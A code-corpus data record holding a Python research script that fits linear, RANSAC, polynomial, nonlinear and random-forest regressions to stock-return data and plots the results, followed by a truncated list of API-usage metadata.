"selenium.webdriver.support.expected_conditions", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 49, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 53, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 58, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 58, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 58, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 58, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 60, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 96, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 96, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 96, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 96, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.text_to_be_present_in_element", "line_number": 99, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 99, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 99, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 99, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "31314452787", "text": "import sys, datetime, pdb, time\nsys.path.append(\"/usr/lib/python3/dist-packages\")\nsys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\nsys.path.append(\"/home/ubuntu/workspace/ml_dev_work\")\nimport matplotlib as mpl\nmpl.use('Agg')\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import cross_val_score, train_test_split\nfrom sklearn.metrics import r2_score, mean_squared_error\nfrom sklearn.linear_model import LinearRegression, RANSACRegressor\nfrom sklearn.preprocessing import StandardScaler, PolynomialFeatures\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import Ridge, ElasticNet, Lasso\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom utils.ml_utils import plot_decision_regions, standardize, IMG_PATH, lin_regplot\nfrom algorithms.linear_regression_gd import LinearRegressionGD\n\n\n\ndef heat_map(df, xcols):\n y = df['target']\n X = df[list(xcols)]\n cols = ['target_proxy'] + list(xcols)\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n sns.set(style='whitegrid', context='notebook') \n sns.pairplot(df[cols], size=2.5) \n plt.tight_layout() \n plt.savefig(IMG_PATH + 'corr_mat.png', dpi=300)\n plt.close()\n \n cm = np.corrcoef(df[cols].values.T)\n sns.set(font_scale=1.5)\n hm = sns.heatmap(cm, \n cbar=True,\n annot=True, \n square=True,\n fmt='.2f',\n annot_kws={'size': 15},\n yticklabels=cols,\n xticklabels=cols)\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'heat_map.png', dpi=300)\n plt.close()\n \ndef linear_regressor(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n lr = LinearRegressionGD()\n lr.fit(np.transpose(np.array([X_train])), y_train)\n plt.plot(range(1, lr.n_iter+1), lr.cost_)\n plt.ylabel('SSE')\n plt.xlabel('Epoch')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'cost.png', dpi=300)\n plt.close()\n \n lin_regplot(np.transpose(np.array([X_train])), y_train, lr)\n plt.savefig(IMG_PATH + 'lin_reg_cost.png', dpi=300)\n plt.close()\n \n # Find the average return of a stock with PE = 20\n # Note: will give odd results if x values are standardized and input is not\n y_val_std = lr.predict([20.0])\n print(\"Estimated Return: %.3f\" % y_val_std)\n print('Slope: %.3f' % lr.w_[1])\n print('Intercept: %.3f' % lr.w_[0])\n\ndef linear_regression_sklearn(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n X = np.transpose(np.array([X])) \n slr = LinearRegression()\n slr.fit(X, y.values)\n y_pred = slr.predict(X)\n print('Slope: %.3f' % slr.coef_[0])\n print('Intercept: %.3f' % slr.intercept_)\n \n lin_regplot(X, y.values, slr)\n plt.xlabel('x val')\n plt.ylabel('Return')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'scikit_lr_fit.png', dpi=300)\n plt.close()\n\n # Closed-form solution\n Xb = np.hstack((np.ones((X.shape[0], 1)), X))\n w = np.zeros(X.shape[1])\n z = np.linalg.inv(np.dot(Xb.T, Xb))\n w = np.dot(z, np.dot(Xb.T, y))\n print('Slope: %.3f' % w[1])\n print('Intercept: %.3f' % w[0])\n \ndef ransac(df, xcols):\n # function to deal with outliers\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n ransac = RANSACRegressor(LinearRegression(), \n max_trials=100, \n min_samples=50, \n residual_metric=lambda x: np.sum(np.abs(x), axis=1), \n residual_threshold=5.0, \n random_state=0)\n \n ransac.fit(X, y)\n inlier_mask = ransac.inlier_mask_\n outlier_mask = np.logical_not(inlier_mask)\n line_X = np.arange(3, 10, 1)\n line_y_ransac = ransac.predict(line_X[:, np.newaxis])\n plt.scatter(X[inlier_mask], y[inlier_mask], c='blue', marker='o', label='Inliers')\n plt.scatter(X[outlier_mask], y[outlier_mask], c='lightgreen', marker='s', label='Outliers')\n plt.plot(line_X, line_y_ransac, color='red') \n plt.xlabel('x-val')\n plt.ylabel('Returns')\n plt.legend(loc='best')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'ransac_fit.png', dpi=300)\n plt.close()\n \ndef polynomial_regression(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n lr = LinearRegression()\n pr = LinearRegression()\n quadratic = PolynomialFeatures(degree=2)\n X_quad = quadratic.fit_transform(X)\n # fit linear features\n lr.fit(X, y)\n X_fit = np.arange(-2,50,1)[:, np.newaxis]\n y_lin_fit = lr.predict(X_fit)\n \n # fit quadratic features\n pr.fit(X_quad, y)\n y_quad_fit = pr.predict(quadratic.fit_transform(X_fit))\n \n # plot results\n plt.scatter(X, y.values, label='training points')\n plt.plot(X_fit, y_lin_fit, label='linear fit', linestyle='--')\n plt.plot(X_fit, y_quad_fit, label='quadratic fit')\n plt.legend(loc='best')\n \n plt.tight_layout()\n plt.savefig(IMG_PATH + 'poly_regression.png', dpi=300)\n plt.close()\n \n y_lin_pred = lr.predict(X)\n y_quad_pred = pr.predict(X_quad)\n print('Training MSE linear: %.3f, quadratic: %.3f' % ( \n mean_squared_error(y, y_lin_pred), \n mean_squared_error(y, y_quad_pred))) \n print('Training R^2 linear: %.3f, quadratic: %.3f' % ( \n r2_score(y, y_lin_pred), \n r2_score(y, y_quad_pred)))\n\ndef nonlinear(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n regr = LinearRegression() \n \n # create quadratic features \n quadratic = PolynomialFeatures(degree=2) \n cubic = PolynomialFeatures(degree=3) \n X_quad = quadratic.fit_transform(X) \n X_cubic = cubic.fit_transform(X) \n \n # fit features \n X_fit = np.arange(X.min(), X.max(), 1)[:, np.newaxis] \n \n regr = regr.fit(X, y) \n y_lin_fit = regr.predict(X_fit) \n linear_r2 = r2_score(y, regr.predict(X)) \n \n regr = regr.fit(X_quad, y) \n y_quad_fit = regr.predict(quadratic.fit_transform(X_fit)) \n quadratic_r2 = r2_score(y, regr.predict(X_quad)) \n \n regr = regr.fit(X_cubic, y) \n y_cubic_fit = regr.predict(cubic.fit_transform(X_fit)) \n cubic_r2 = r2_score(y, regr.predict(X_cubic)) \n \n \n # plot results \n plt.scatter(X, y, label='training points', color='lightgray') \n \n plt.plot(X_fit, y_lin_fit, \n label='linear (d=1), $R^2=%.2f$' % linear_r2, \n color='blue', \n lw=2, \n linestyle=':') \n \n plt.plot(X_fit, y_quad_fit, \n label='quadratic (d=2), $R^2=%.2f$' % quadratic_r2, \n color='red', \n lw=2, \n linestyle='-') \n \n plt.plot(X_fit, y_cubic_fit, \n label='cubic (d=3), $R^2=%.2f$' % cubic_r2, \n color='green', \n lw=2, \n linestyle='--') \n \n plt.xlabel('x-val') \n plt.ylabel('Return') \n plt.legend(loc='best') \n plt.tight_layout()\n plt.savefig(IMG_PATH + 'nonlinear_regr.png', dpi=300)\n plt.close()\n \n pdb.set_trace()\n # transform features\n X_log = np.log(X)\n y_sqrt = np.sqrt(y)\n \n # fit features\n X_fit = np.arange(X_log.min()-1, X_log.max()+1, 1)[:, np.newaxis]\n regr = regr.fit(X_log, y_sqrt)\n y_lin_fit = regr.predict(X_fit)\n linear_r2 = r2_score(y_sqrt, regr.predict(X_log))\n \n # plot results\n plt.scatter(X_log, y_sqrt, label='training points', color='lightgray')\n plt.plot(X_fit, y_lin_fit, \n label='linear (d=1), $R^2=%.2f$' % linear_r2, \n color='blue', \n lw=2)\n \n plt.xlabel('x-val')\n plt.ylabel('Return')\n plt.legend(loc='best')\n plt.tight_layout()\n plt.savefig(IMG_PATH + 'sqrt_log.png', dpi=300)\n\ndef random_forest_regression(df, xcols):\n y = df['target_proxy']\n X = df[list(xcols)[0]]\n X = np.transpose(np.array([X]))\n \n # Standardize and split the training nad test data\n X_std = standardize(X)\n ts = 0.3\n X_train, X_test, y_train, y_test = \\\n train_test_split(X_std, y, test_size=ts, random_state=0)\n \n tree = DecisionTreeRegressor(max_depth=3)\n tree.fit(X, y)\n sort_idx = X.flatten().argsort()\n lin_regplot(X[sort_idx], y[sort_idx], tree)\n plt.xlabel('x-val')\n plt.ylabel('Return')\n plt.savefig(IMG_PATH + 'tree_regression.png', dpi=300)\n plt.close()\n \n forest = RandomForestRegressor(n_estimators=1000, \n criterion='mse', \n random_state=1, \n n_jobs=-1)\n forest.fit(X_train, y_train)\n y_train_pred = forest.predict(X_train)\n y_test_pred = forest.predict(X_test)\n print('MSE train: %.3f, test: %.3f' % (\n mean_squared_error(y_train, y_train_pred),\n mean_squared_error(y_test, y_test_pred)))\n print('R^2 train: %.3f, test: %.3f' % (\n r2_score(y_train, y_train_pred),\n r2_score(y_test, y_test_pred)))\n \n plt.scatter(y_train_pred, \n y_train_pred - y_train, \n c='black', \n marker='o', \n s=35, \n alpha=0.5, \n label='Training data') \n plt.scatter(y_test_pred, \n y_test_pred - y_test, \n c='lightgreen', \n marker='s', \n s=35, \n alpha=0.7, \n label='Test data') \n plt.xlabel('Predicted values') \n plt.ylabel('Residuals') \n plt.legend(loc='best') \n plt.hlines(y=0, xmin=-10, xmax=50, lw=2, color='red') \n plt.xlim([-10, 50]) \n plt.tight_layout()\n plt.savefig(IMG_PATH + 'slr_residuals.png', dpi=300)", "repo_name": "mccarvik/python_for_finance", "sub_path": "research/ml_analysis/scripts/continuous_variables.py", "file_name": "continuous_variables.py", "file_ext": "py", "file_size_in_byte": 11348, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 7, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 35, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 37, "usage_type": "call"}, {"api_name": "seaborn.pairplot", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.corrcoef", "line_number": 43, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 44, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "utils.ml_utils.standardize", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 65, "usage_type": "call"}, {"api_name": "algorithms.linear_regression_gd.LinearRegressionGD", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.ml_utils.standardize", "line_number": 92, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 98, "usage_type": "call"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 129, "usage_type": "call"}, {"api_name": "sklearn.linear_model.RANSACRegressor", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 142, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 159, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 162, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 164, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 170, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 190, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 191, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 193, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 205, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 207, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 210, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 216, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 220, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 224, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 256, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "pdb.set_trace", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 265, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 277, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 278, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 278, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 281, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 286, "usage_type": "call"}, {"api_name": "utils.ml_utils.standardize", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 292, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 294, "usage_type": "call"}, {"api_name": "utils.ml_utils.lin_regplot", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 300, "usage_type": "name"}, {"api_name": "utils.ml_utils.IMG_PATH", "line_number": 300, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 303, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 311, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 312, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 314, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 315, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 324, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 324, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 332, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 332, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 333, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 333, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 334, "usage_type": "call"}, 